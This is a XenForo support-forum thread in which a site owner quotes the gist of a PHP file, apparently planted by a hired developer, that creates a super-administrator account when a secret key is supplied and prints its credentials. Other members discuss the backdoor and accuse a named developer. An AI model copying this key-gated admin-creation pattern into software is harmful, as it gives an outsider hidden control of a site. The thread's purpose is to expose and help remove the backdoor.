XF 2.2 xenforo developer may have added an exploit file

MR X

Member
so i hired a dev on fiverr to make me an addon, it took way to long to complete by the time frame so i fired him, then some time later re-hired him to actually finish it, garbage work was done, but apparently he may or may not have uploaded a file named xf.php in /home/domain-name/public_html/data/xf.php, this is not an official xenforo file is it? because within it is.

PHP:
if ($key == 'dfdasfasfsjd544fjjkl') {
    // Create a new user with random credentials
    $registration = \XF::service('XF:User\Registration');
    $input['username'] = $randomString;
    $input['email'] = "$randomString@gmail.com";
    $input['password'] = $randomString;
    $registration->setFromInput($input);
    $registration->skipEmailConfirmation(true);
    $user = $registration->save();

    // Force admin privileges
    $user->secondary_group_ids = [3, 8, 5];  // Elevated groups
    $admin = \XF::app()->em()->create('XF:Admin');
    $admin->user_id = $user->user_id;
    $input['is_super_admin'] = true;
    $form->basicEntitySave($admin, $input);
    $form->run();

    echo $randomString;  // Prints the generated credentials
}

that is just the jist of what all was in it.

appreciate some support thank you.
 
he basically added a backdoor like i said, but he also added advertisement code so he can profit on my website, (ad code within the addon he was fixing up. (i would say the bad actors devs name, but i dont know if i can expose it on XF)
 
he basically added a backdoor like i said, but he also added advertisement code so he can profit on my website, (ad code within the addon he was fixing up. (i would say the bad actors devs name, but i dont know if i can expose it on XF)

It would be interesting to know the developer, I wouldn't want anything of himself installed on my forum.
 
That's scary that an admin account could be added so easily by planting a file like that.

I wonder if this should be reported as a bug.
He probably couldn't edit the forum files or addons without triggering the notice in admin files have been modified so he's just added a whole new file he can access from URL and print out credentials for a super user. It's not so much a bug it's who has access to your server.
 
xenbulletin

i am aware its bob (but i think bob hired/has a team and that person he told me to hire from his team is the bad actor, his name on fiverr is xenaddon i believe
This seems to be our old friend here:

 
This seems to be our old friend here:

well this is who i hired.
but again i am not entirely sure its the same dev.
 
If it's Fahad Ashraf, the add-on is terrible. The code doesn't comply with Xenforo standards or minimum security requirements.

I recommend uninstalling any code he sold you. Not only that, but he also installed a backdoor.

As if that weren't enough, he's using “XenAddon” on Fiverr to exploit @Bob name and his add-ons. I doubt Bob has anything to do with this person, who is unfortunately already known on Xenforo.

 
Last edited:
If it's Fahad Ashraf, the add-on is terrible. The code doesn't comply with Xenforo standards or minimum security requirements.

I recommend uninstalling any code he sold you. Not only that, but he also installed a backdoor.

As if that weren't enough, he's using “XenAddon” on Fiverr to exploit @Bob name and his add-ons. I doubt Bob has anything to do with this person, who is unfortunately already known on Xenforo.

i never doubted it was bob, i know its just some low life scammer.
 
  • Like
Reactions: Bob
Ya, definitely not me lol I don't have a Fiverr account (never have, never will). I am also extremely picky on what type of projects it take on. I can assure you that I'd never be interested in tiny project like this. Its large scale CMS and Sports type addons that I focus on.

Hope you find the dude and kick his ass.
 
Back
Top Bottom